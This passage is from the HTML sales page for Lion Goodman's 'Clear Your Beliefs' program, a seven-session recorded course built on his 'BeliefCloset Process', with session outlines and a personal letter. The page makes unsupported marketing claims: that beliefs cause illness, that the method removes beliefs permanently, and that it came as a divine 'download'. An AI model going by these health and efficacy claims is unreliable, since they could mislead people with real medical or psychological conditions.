habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one 